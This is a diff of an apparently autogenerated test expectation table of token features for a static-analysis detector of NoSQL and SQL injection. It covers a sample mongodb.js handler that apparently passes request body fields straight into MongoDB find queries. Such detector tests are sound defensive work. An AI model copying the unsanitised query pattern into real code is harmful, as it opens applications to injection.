anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:59:34:5 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:60:14:62 | err | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:60:14:62 | err | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:60:14:62 | err | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:60:14:62 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:60:14:62 | err | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:14:65:14:66 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:13 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:13 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:13 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:13 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:13 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc = d ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc = d ... ('doc') | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc = d ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:11:15:36 | doc = d ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:18 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:18 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:18 | db | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:18 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:18 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:29 | db.collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:29 | db.collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:29 | db.collection | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:29 | db.collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:29 | db.collection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | db.collection('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | db.collection('doc') | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | exceptional return of db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | exceptional return of db.collection('doc') | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | exceptional return of db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:17:15:36 | exceptional return of db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:20:15:29 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:20:15:29 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:20:15:29 | collection | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:20:15:29 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:20:15:29 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:31:15:35 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:31:15:35 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:31:15:35 | 'doc' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1517,6 +8162,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:31:15:35 | 'doc' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:31:15:35 | 'doc' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:15:31:15:35 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:9 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:9 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:9 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:9 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:14 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:14 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:14 | doc.find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:14 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:14 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | doc.find(query) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | exceptional return of doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | exceptional return of doc.find(query) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:7:18:21 | exceptional return of doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:11:18:14 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:11:18:14 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:11:18:14 | find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:11:18:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:11:18:14 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:16:18:20 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:16:18:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:16:18:20 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1525,6 +8195,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:16:18:20 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:16:18:20 | query | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:18:16:18:20 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:9 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:9 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:9 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:9 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:14 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:14 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:14 | doc.find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:14 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:14 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | doc.fin ... itle }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | doc.fin ... itle }) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | doc.fin ... itle }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | doc.fin ... itle }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | doc.fin ... itle }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | exceptional return of doc.fin ... itle }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | exceptional return of doc.fin ... itle }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | exceptional return of doc.fin ... itle }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | exceptional return of doc.fin ... itle }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:7:21:48 | exceptional return of doc.fin ... itle }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:11:21:14 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:11:21:14 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:11:21:14 | find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:11:21:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:11:21:14 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:16:21:47 | { title ... title } | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:16:21:47 | { title ... title } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:16:21:47 | { title ... title } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1533,6 +8228,27 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:16:21:47 | { title ... title } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:16:21:47 | { title ... title } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:16:21:47 | { title ... title } | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:22 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:22 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:22 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:22 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:22 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:18:21:45 | title: ... y.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:26 | '' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:26 | '' | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:26 | '' | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:26 | '' | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:26 | '' | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:26 | '' | stringConcatenatedWith | -endpoint- query.body.title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:45 | '' + qu ... y.title | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:45 | '' + qu ... y.title | InputAccessPathFromCallee | 0.title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:45 | '' + qu ... y.title | InputArgumentIndex | 0 | @@ -1542,6 +8258,57 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:45 | '' + qu ... y.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:45 | '' + qu ... y.title | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:25:21:45 | '' + qu ... y.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:34 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:34 | query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:34 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:34 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:34 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:39 | query.body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:39 | query.body | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:39 | query.body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:39 | query.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:39 | query.body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:45 | query.body.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:45 | query.body.title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:45 | query.body.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:45 | query.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:45 | query.body.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:30:21:45 | query.body.title | stringConcatenatedWith | '' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:36:21:39 | body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:36:21:39 | body | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:36:21:39 | body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:36:21:39 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:36:21:39 | body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:41:21:45 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:41:21:45 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:41:21:45 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:41:21:45 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:21:41:21:45 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:9 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:9 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:9 | doc | 